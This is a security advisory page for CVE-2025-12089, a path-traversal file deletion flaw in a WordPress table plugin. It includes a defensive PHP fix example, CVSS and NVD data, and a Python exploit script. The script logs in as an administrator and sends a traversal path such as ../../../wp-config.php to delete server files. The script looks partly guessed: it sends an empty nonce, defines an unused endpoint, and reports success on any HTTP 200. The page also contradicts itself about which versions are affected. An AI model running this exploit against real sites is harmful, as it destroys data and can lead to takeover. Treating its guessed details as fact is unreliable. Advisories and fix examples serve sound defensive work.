Security Vulnerability Report
CVE-2025-12089 CVSS 6.5 MEDIUM

CVE-2025-12089

Published: 2025-11-13 04:15:46
Last Modified: 2026-04-15 00:35:42

Description

The Data Tables Generator by Supsystic plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the cleanCache() function in all versions up to, and including, 1.10.45. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).
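The description attributes the flaw to insufficient path validation in cleanCache(). As an added illustration of the fix pattern, not the plugin's own code, the PHP below confines a cache-cleanup routine to its cache directory. The function name safe_clean_cache, the $cache_root argument and the .cache extension are assumptions, since the advisory does not show the plugin's actual implementation. It canonicalises both the trusted root and the requested entry with realpath(), accepts only a bare file name, requires the resolved path to remain under the root (which also defeats a symlink pointing elsewhere), and deletes only regular files carrying the expected extension.

```php
<?php
// Added example (not the plugin's own code): confine cache-file deletion to one directory.
// safe_clean_cache(), $cache_root and the '.cache' extension are assumptions; the real
// plugin's cleanCache() signature and cache layout are not shown in the advisory.

/**
 * Delete a cache entry only if it resolves to a regular file inside $cache_root.
 * Returns true when a file was deleted, false when the request was rejected.
 */
function safe_clean_cache(string $cache_root, string $requested, string $ext = 'cache'): bool
{
    // Canonicalise the trusted root first: realpath() resolves symlinks and "../" segments.
    $root = realpath($cache_root);
    if ($root === false || !is_dir($root)) {
        return false;
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // Accept only a bare file name. Embedded NUL bytes and any directory component
    // (which is what "../../../wp-config.php" carries) are rejected up front.
    if ($requested === '' || strpos($requested, "\0") !== false || basename($requested) !== $requested) {
        return false;
    }

    // Resolve the candidate and require it to remain under the root. This second check
    // also catches a cache entry that is a symlink pointing outside the directory.
    $target = realpath($root . $requested);
    if ($target === false || strncmp($target, $root, strlen($root)) !== 0) {
        return false;
    }

    // Only regular files carrying the cache extension are eligible for unlink().
    if (!is_file($target) || pathinfo($target, PATHINFO_EXTENSION) !== $ext) {
        return false;
    }

    return unlink($target);
}

// Demonstration on a throwaway directory (constructed here, not taken from the advisory).
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dtg-cache-' . bin2hex(random_bytes(4));
mkdir($root);
file_put_contents($root . DIRECTORY_SEPARATOR . 'table-1.cache', 'cached table html');
$outside = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dtg-outside-' . bin2hex(random_bytes(4)) . '.cache';
file_put_contents($outside, 'must survive');

$results = [
    'legitimate entry'      => safe_clean_cache($root, 'table-1.cache'),
    'sibling via ../'       => safe_clean_cache($root, '../' . basename($outside)),
    'wp-config traversal'   => safe_clean_cache($root, '../../../wp-config.php'),
    'outside file survives' => file_exists($outside),
];
foreach ($results as $case => $ok) {
    printf("%-23s %s\n", $case, $ok ? 'true' : 'false');
}

// Remove the demonstration files.
unlink($outside);
rmdir($root);
```

Run it with the php CLI: the script creates a temporary cache directory, removes the one legitimate entry, and leaves the file outside that directory in place when the same traversal shape as the PoC's ../../../wp-config.php argument is attempted. The capability and nonce checks on the AJAX handler still belong there, but the CVSS vector (PR:H) shows this issue was reachable by administrators who pass those checks, so the path confinement inside the deletion routine is the control that closes the bug.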

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Data Tables Generator by Supsystic < 1.10.45

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12089 PoC - Arbitrary File Deletion
# Target: Data Tables Generator by Supsystic plugin for WordPress
# Authentication: Requires Administrator-level access


def delete_arbitrary_file(target_url, wp_username, wp_password, file_to_delete):
    """
    Delete arbitrary file on the server via cleanCache() function vulnerability

    Args:
        target_url: WordPress target URL (e.g., https://example.com)
        wp_username: WordPress administrator username
        wp_password: WordPress administrator password
        file_to_delete: Absolute path of file to delete
    """
    session = requests.Session()

    # Step 1: Login to WordPress admin
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': wp_username,
        'pwd': wp_password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    login_response = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' not in session.cookies.get_dict():
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Trigger cleanCache with arbitrary file path
    # The vulnerability allows path traversal via cache_dir parameter
    exploit_url = f"{target_url}/wp-admin/admin-ajax.php"
    # Encode file path for path traversal
    # Example: ../../../wp-config.php or specific file path
    exploit_data = {
        'action': 'supsystic_tbl_cache_clean',
        'cache_dir': file_to_delete,  # Arbitrary file path
        'nonce': ''  # Need to obtain valid nonce from page source
    }
    # Alternative exploitation via direct POST to cache clean endpoint
    cache_clean_url = f"{target_url}/wp-admin/admin.php?page=supsystic-tables&module=cache"
    print(f"[*] Attempting to delete: {file_to_delete}")
    # Send exploitation request
    exploit_response = session.post(exploit_url, data=exploit_data)
    if exploit_response.status_code == 200:
        print("[+] Exploitation request sent")
        print(f"[+] Response: {exploit_response.text}")
        return True


if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> <file_to_delete>")
        print(f"Example: python {sys.argv[0]} https://example.com admin password ../../../wp-config.php")
        sys.exit(1)
    target = sys.argv[1]
    username = sys.argv[2]
    password = sys.argv[3]
    file_path = sys.argv[4]
    delete_arbitrary_file(target, username, password, file_path)
```

References

https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394112%40data-tables-generator-by-supsystic&new=3394112%40data-tables-generator-by-supsystic&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/15e671e5-a9a6-4439-93cc-8d46fe0cde16?source=cve

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-12089", "sourceIdentifier": "[email protected]", "published": "2025-11-13T04:15:45.723", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Data Tables Generator by Supsystic plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the cleanCache() function in all versions up to, and including, 1.10.45. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3394112%40data-tables-generator-by-supsystic&new=3394112%40data-tables-generator-by-supsystic&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/15e671e5-a9a6-4439-93cc-8d46fe0cde16?source=cve", "source": "[email protected]"}]}}
```